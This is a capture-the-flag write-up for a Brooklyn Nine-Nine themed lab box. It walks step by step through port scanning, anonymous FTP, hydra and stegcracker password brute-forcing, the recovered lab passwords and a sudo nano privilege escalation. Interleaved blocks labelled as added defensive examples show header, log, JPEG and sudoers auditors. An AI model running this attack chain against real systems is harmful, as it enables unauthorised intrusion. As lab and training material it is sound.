Steganography is the practice of hiding a file or message inside another file. The only thing we are given is the target IP.
1. Reconnaissance
First I ran an Nmap scan, using the default scripts (-sC) and version detection (-sV).
┌──(root💀kali)-[~]
└─# nmap -sC -sV 10.10.107.210
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-30 06:39 EST
Nmap scan report for 10.10.107.210
Host is up (0.29s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.0.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.13 seconds
Three ports are open, 21 (ftp), 22 (ssh) and 80 (http), and a file named note_to_jake.txt is visible on the FTP server.
Next I used GoBuster to look for hidden directories and files.
┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.107.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.107.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html
[+] Timeout: 10s
===============================================================
2021/12/30 07:04:41 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 718]
/index.html
Next I ran a Nikto web scan.
┌──(root💀kali)-[~]
└─# nikto -host 10.10.107.210
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.107.210
+ Target Hostname: 10.10.107.210
+ Target Port: 80
+ Start Time: 2021-12-30 07:05:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2ce, size: 5a5ee14bb8d76, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
Nothing much of interest here.
Next I looked at the website itself.
In the page source there is a commented-out hint about steganography (<!-- Have you ever heard of steganography? -->).
Download the image from the index.html page for later.
From the earlier reconnaissance we know that anonymous FTP access is enabled. Let's connect to the FTP server and fetch the text file containing the note.
login name: anonymous / pw: leave blank
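The Nikto findings above (missing X-Frame-Options and X-Content-Type-Options, a Server header that discloses the Apache version) are the kind of thing a defender fixes in the Apache config and then verifies from the response. The following is an added example, not code from the original post: a small checker that parses a raw HTTP response and reports each missing hardening header together with the mod_headers directive that adds it. Both responses are constructed samples modelled on the scan output, not captures from the host. X-XSS-Protection, which Nikto still flags, is deliberately not required here because current browsers have dropped it; a Content-Security-Policy is checked instead.

```python
import re

# Constructed sample response modelled on the Nikto findings above
# (not a capture from the real host).
VULNERABLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 30 Dec 2021 12:05:12 GMT\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 718\r\n"
    "\r\n"
    "<html><!-- Have you ever heard of steganography? --></html>"
)

# The same page after the Apache config has been hardened (also constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'self'\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html></html>"
)

# Header the site should send -> Apache directive (requires mod_headers,
# enabled with `a2enmod headers`) that adds it.
REQUIRED = {
    "x-frame-options": 'Header always set X-Frame-Options "SAMEORIGIN"',
    "x-content-type-options": 'Header always set X-Content-Type-Options "nosniff"',
    "content-security-policy":
        "Header always set Content-Security-Policy \"default-src 'self'; frame-ancestors 'self'\"",
}


def parse_headers(raw):
    """Split a raw HTTP response into (status line, {lower-cased name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def audit(raw):
    """Return a list of (issue, header, fix) findings for a raw HTTP response."""
    _, headers = parse_headers(raw)
    findings = []
    for name, fix in REQUIRED.items():
        if name not in headers:
            findings.append(("missing", name, fix))
    # A version number in the Server header is the disclosure Nikto used to
    # decide the Apache build was outdated; ServerTokens Prod reduces it to "Apache".
    server = headers.get("server", "")
    if re.search(r"\d+\.\d+", server):
        findings.append(("version-disclosure", "server", "ServerTokens Prod"))
    return findings


if __name__ == "__main__":
    for issue, header, fix in audit(VULNERABLE_RESPONSE):
        print(f"{issue:20} {header:25} -> {fix}")
    print("hardened:", audit(HARDENED_RESPONSE))
```

To use it against a live site, capture one response with `curl -si http://host/` and feed the text to `audit()`; an empty list means every required header is present and the Server header no longer carries a version.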
└─# ftp 10.10.107.210 1 ⨯
Connected to 10.10.107.210.
220 (vsFTPd 3.0.3)
Name (10.10.107.210:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.00 secs (103.2069 kB/s)
ftp> exit
221 Goodbye.
From the note we learn that Jake's password is weak and that there is someone named Holt. Holt is probably Jake's superior and likely has access to the server.
└─# cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
2. Password brute force
Since we know Jake's password is weak, I brute-forced the SSH login with hydra.
┌──(root💀kali)-[~]
└─# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.107.210 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-30 07:31:43
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.107.210:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[22][ssh] host: 10.10.107.210 login: jake password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-30 07:34:14
This gives us login: jake password: 987654321.
Let's log in.
┌──(root💀kali)-[~]
└─# ssh jake@10.10.107.210
The authenticity of host '10.10.107.210 (10.10.107.210)' can't be established.
ED25519 key fingerprint is SHA256:ceqkN71gGrXeq+J5/dquPWgcPWwTmP2mBdFS2ODPZZU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.107.210' (ED25519) to the list of known hosts.
jake@10.10.107.210's password:
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ cd ..
jake@brookly_nine_nine:/home$ ls
amy holt jake
jake@brookly_nine_nine:/home$ ls holt
nano.save user.txt
jake@brookly_nine_nine:/home$ cd holt
jake@brookly_nine_nine:/home/holt$ cat user.txt
ee11cbb19052e40b07aac0ca060c23ee
The first flag can be read from user.txt.
3. Steganography
Let's examine the image we downloaded earlier with exiftool.
Install it if you don't have it:
apt install libimage-exiftool-perl
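The hydra run above is noisy from the server's side: at 44 tries per minute every guess lands in the SSH daemon's log as a "Failed password" line from one source, followed by an "Accepted password" when the weak password is hit. The following is an added example, not part of the original post, showing the detection logic a defender would run over that log: a sliding-window counter that raises an alert once a source crosses a failure threshold, and a second, higher-severity alert if that same source later logs in successfully. The auth.log excerpt is constructed to resemble the session on this page, and the log format, thresholds and year are assumptions.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (not captured from the box): an SSH password
# spray against "jake" from one source, one stray failure from elsewhere,
# an unrelated legitimate login, and the success that follows the burst.
SAMPLE_LOG = """\
Dec 30 07:31:44 brookly_nine_nine sshd[1201]: Failed password for jake from 10.9.0.206 port 50120 ssh2
Dec 30 07:31:45 brookly_nine_nine sshd[1203]: Failed password for jake from 10.9.0.206 port 50122 ssh2
Dec 30 07:31:46 brookly_nine_nine sshd[1205]: Failed password for jake from 10.9.0.206 port 50124 ssh2
Dec 30 07:31:46 brookly_nine_nine sshd[1207]: Failed password for invalid user admin from 10.9.0.50 port 40010 ssh2
Dec 30 07:31:47 brookly_nine_nine sshd[1209]: Failed password for jake from 10.9.0.206 port 50126 ssh2
Dec 30 07:31:48 brookly_nine_nine sshd[1211]: Failed password for jake from 10.9.0.206 port 50128 ssh2
Dec 30 07:31:49 brookly_nine_nine sshd[1213]: Failed password for jake from 10.9.0.206 port 50130 ssh2
Dec 30 07:32:10 brookly_nine_nine sshd[1215]: Accepted password for holt from 10.10.10.18 port 51000 ssh2
Dec 30 07:34:13 brookly_nine_nine sshd[1301]: Accepted password for jake from 10.9.0.206 port 50190 ssh2
""".splitlines()

# OpenSSH password-auth lines in the classic syslog layout (assumed format).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)


def parse(line, year=2021):
    """Parse one sshd line into (timestamp, result, user, src); None if it is not one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year, so the caller supplies it
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect(lines, threshold=5, window=60):
    """Sliding-window brute-force detector.

    Emits ("bruteforce", src, n, user) when `threshold` failures from one source
    fall within `window` seconds, and ("success-after-bruteforce", src,
    total_failures, user) when a flagged source later authenticates successfully."""
    recent = defaultdict(deque)   # src -> failure timestamps still inside the window
    total_failed = Counter()      # src -> every failure seen
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        ts, result, user, src = ev
        q = recent[src]
        while q and (ts - q[0]).total_seconds() > window:
            q.popleft()
        if result == "Failed":
            q.append(ts)
            total_failed[src] += 1
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src, len(q), user))
        elif src in flagged:
            alerts.append(("success-after-bruteforce", src, total_failed[src], user))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A threshold of five failures in a minute is far below hydra's rate on this box, so the first alert fires a few seconds into the run; the second alert is the one worth paging on, because it marks the point where a guessed password actually worked.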
┌──(root💀kali)-[~/Downloads/tryhackme]
└─# exiftool brooklyn99.jpg
ExifTool Version Number : 12.38
File Name : brooklyn99.jpg
Directory : .
File Size : 68 KiB
File Modification Date/Time : 2021:12:30 07:45:32-05:00
File Access Date/Time : 2021:12:30 07:45:32-05:00
File Inode Change Date/Time : 2021:12:30 07:45:32-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 533
Image Height : 300
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 533x300
Megapixels : 0.160
We can see that the file type is JPEG.
One tool for extracting hidden data from images is Steghide.
Install it if you don't have it:
apt install steghide
Extraction requires a passphrase, so the data cannot be reached without it. We need to find the passphrase.
┌──(root💀kali)-[~/Downloads/tryhackme]
└─# steghide extract -sf brooklyn99.jpg
Enter passphrase:
steghide: can not uncompress data. compressed data is corrupted.
Let's brute-force the passphrase with Stegcracker using rockyou.txt.
┌──(root💀kali)-[~/Downloads/tryhackme]
└─# stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2021 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20395 passwords
Your file has been written to: brooklyn99.jpg.out
The passphrase is admin, and the extracted data is written to brooklyn99.jpg.out.
┌──(root💀kali)-[~/Downloads/tryhackme]
└─# cat brooklyn99.jpg.out
Holts Password:
fluffydog12@ninenine
Enjoy!!
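When an image is suspected of carrying a payload, the first thing an analyst does is what exiftool did above: inventory the file's structure. The following is an added example, not code from the original post: a small JPEG marker walker that lists every segment, skips the entropy-coded scan data correctly (stuffed 0xFF00 bytes and RSTn markers are not segment boundaries) and reports any bytes appended after the EOI marker, which is the simplest and most common way a second file gets hidden inside a JPEG. Steghide, the tool used on this page, embeds in the DCT coefficients rather than after EOI, so a clean trailer does not rule it out; the check catches appended payloads and structural damage, not coefficient-domain embedding. The sample JPEG is a constructed marker skeleton, not the page's brooklyn99.jpg, and is not a decodable picture.

```python
import struct

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: SOI, EOI, TEM and RST0-RST7.
STANDALONE = {SOI, EOI, 0x01} | set(range(0xD0, 0xD8))


def walk_jpeg(data):
    """Walk the marker segments of a JPEG.

    Returns (segments, trailing): segments is a list of (marker, offset, size)
    tuples and trailing is whatever follows the EOI marker. Raises ValueError
    when the marker structure is broken or EOI never appears."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("no SOI marker: not a JPEG")
    segments = [(SOI, 0, 2)]
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte in front of a marker
            pos += 1
            continue
        if marker in STANDALONE:
            segments.append((marker, pos, 2))
            pos += 2
            if marker == EOI:
                return segments, data[pos:]
            continue
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        segments.append((marker, pos, length + 2))
        pos += 2 + length
        if marker == SOS:
            # Entropy-coded data follows the SOS header: advance until the next
            # real marker, ignoring stuffed 0xFF00 bytes and RSTn restart markers.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker: truncated or malformed JPEG")


def inspect(data):
    """Summarise the marker sequence and any bytes appended after EOI."""
    segments, trailing = walk_jpeg(data)
    return {
        "markers": [f"FF{m:02X}" for m, _, _ in segments],
        "trailing_bytes": len(trailing),
        "trailing_preview": trailing[:16],
    }


def build_sample(trailer=b""):
    """Constructed minimal JPEG skeleton: SOI, APP0/JFIF, SOS plus fake scan
    data, EOI, then an optional appended payload. Only the structure matters."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"   # contains a stuffed FF00 and an RST0
    return (b"\xff\xd8"
            + b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
            + b"\xff\xda" + struct.pack(">H", len(sos) + 2) + sos
            + scan + b"\xff\xd9" + trailer)


if __name__ == "__main__":
    print(inspect(build_sample()))
    print(inspect(build_sample(b"PK\x03\x04 appended archive")))
```

Run it on a real file with `inspect(open("image.jpg", "rb").read())`; a non-zero `trailing_bytes` is the signal to carve the trailer out and identify it, and a `ValueError` means the file is not a well-formed JPEG at all, which is itself worth a closer look.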
Log in to the holt account with the password we obtained.
┌──(root💀kali)-[~/Downloads/tryhackme]
└─# ssh holt@10.10.107.210 130 ⨯
holt@10.10.107.210's password:
Last login: Tue May 26 08:59:00 2020 from 10.10.10.18
holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /bin/nano
Since holt can run /bin/nano as root without a password, the last flag can be read simply by opening root.txt in nano under sudo.
holt@brookly_nine_nine:~$ sudo nano /root/root.txt
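The root flag falls out of a single sudoers line, `(ALL) NOPASSWD: /bin/nano`: an interactive editor run as root can open any file on the system, so the rule is equivalent to granting root. The following is an added example, not code from the original post: a small sudoers auditor that parses rules in the format `sudo -l` and /etc/sudoers use and flags the patterns a defender should never see for a non-root user: `ALL` as the command, wildcards in the command, editors and pagers run as root, and `NOPASSWD` on anything. The sudoers text is constructed; only the holt line mirrors what the page shows, the other lines are made up for contrast, and the set of flagged editors is an assumption.

```python
import os
import re

# Constructed sudoers excerpt modelled on the `sudo -l` output above. The holt
# rule is the one the page shows; the other rules are invented for contrast.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
holt    ALL=(ALL) NOPASSWD: /bin/nano
amy     ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2
jake    ALL=(ALL) /usr/bin/apt-get *
"""

# user_or_group  host = (runas[:group]) [TAG: ...] cmd1, cmd2, ...
RULE_RE = re.compile(
    r"^(?P<who>[%+]?\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Interactive editors and pagers: run as root, each can open an arbitrary file
# and most can spawn a shell, so none is a safe sudo target (assumed list).
EDITORS_AND_PAGERS = {"nano", "vi", "vim", "view", "emacs", "less", "more"}


def audit(text):
    """Return a (who, runas, command, reason) tuple for every risky sudoers rule."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m["who"] == "root":
            continue
        runas = m["runas"] or "root"          # sudoers defaults the run-as user to root
        as_root = runas.split(":")[0] in ("root", "ALL")
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append((m["who"], runas, cmd, "all-commands"))
                continue
            if "*" in cmd:
                findings.append((m["who"], runas, cmd, "wildcard"))
            if as_root and binary in EDITORS_AND_PAGERS:
                findings.append((m["who"], runas, cmd, "editor-or-pager-as-root"))
            if nopasswd:
                findings.append((m["who"], runas, cmd, "nopasswd"))
    return findings


if __name__ == "__main__":
    for who, runas, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{reason:25} {who:8} ({runas}) {cmd}")
```

The fix for the holt rule is not a different editor: if a user genuinely needs to edit one root-owned file, grant `sudoedit /path/to/that/file` instead, which edits a temporary copy with the user's own editor and never runs the editor itself as root.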